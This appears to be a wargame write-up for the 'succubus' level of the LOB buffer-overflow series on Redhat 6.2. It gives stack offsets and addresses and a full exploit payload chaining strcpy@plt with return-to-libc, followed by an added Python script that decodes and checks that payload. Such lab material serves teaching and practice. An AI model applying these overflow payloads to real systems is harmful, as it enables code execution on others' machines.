LOB Redhat 6.2 - succubus

5unKn0wn 2015. 11. 2. 05:22


succubus - PLT

Stack : *addr[4] + buffer[40] + sfp[4] + ret[4]

strcpy(PLT) : 0x8048410

buffer : 0xbffffa90

strcpy_dest : 0xbffffac0
strcpy_source : 0xbffffa90

Payload : ./nightmare `python -c 'print "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40" + "A"*32 + "\x10\x84\x04\x08" + "AAAA" + "\xc0\xfa\xff\xbf" + "\x90\xfa\xff\xbf"'`


Using strcpy + RTL
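The payload above, decoded against the stack layout in these notes, as an added example that is not part of the original post. It takes the addresses listed in the notes at face value; the field names (`head_words`, `callee_ret_addr`, and so on) are labels chosen here. It shows that strcpy_dest is the 4-byte slot directly after ret, where the "AAAA" placeholder sits.

```python
import struct

# Values copied from the notes above.
BUFFER_ADDR = 0xBFFFFA90
STRCPY_PLT = 0x08048410
BUF_LEN, SFP_LEN, WORD = 40, 4, 4

# Bytes exactly as the page's python -c expression builds them.
PAYLOAD = (b"\xe0\x8a\x05\x40" + b"\xe0\x91\x03\x40" + b"\xf9\xbf\x0f\x40"
           + b"A" * 32 + b"\x10\x84\x04\x08" + b"AAAA"
           + b"\xc0\xfa\xff\xbf" + b"\x90\xfa\xff\xbf")


def u32(data, off):
    """Read one little-endian 32-bit word (i386 byte order)."""
    return struct.unpack_from("<I", data, off)[0]


def decode(payload, buffer_addr=BUFFER_ADDR):
    """Split the payload into the fields of the page's stack layout."""
    ret_off = BUF_LEN + SFP_LEN          # buffer[40] + sfp[4] precede ret
    if len(payload) != ret_off + 4 * WORD:
        raise ValueError("payload does not match the layout on the page")
    return {
        "head_words": [u32(payload, i) for i in range(0, 3 * WORD, WORD)],
        "ret": u32(payload, ret_off),
        # cdecl frame seen by the function entered through ret:
        # [return address][arg1 = dest][arg2 = src]
        "callee_ret_addr": buffer_addr + ret_off + WORD,
        "callee_ret_bytes": payload[ret_off + WORD:ret_off + 2 * WORD],
        "dest": u32(payload, ret_off + 2 * WORD),
        "src": u32(payload, ret_off + 3 * WORD),
    }


def check(payload=PAYLOAD):
    """Return the decoded fields and a dict of layout facts (name -> bool)."""
    f = decode(payload)
    facts = {
        "ret is strcpy@plt": f["ret"] == STRCPY_PLT,
        "src is buffer start": f["src"] == BUFFER_ADDR,
        "dest is the slot after ret": f["dest"] == f["callee_ret_addr"],
        "no NUL byte (argv and strcpy stop at NUL)": b"\x00" not in payload,
    }
    return f, facts


if __name__ == "__main__":
    for name, ok in check()[1].items():
        print(("ok   " if ok else "FAIL ") + name)
```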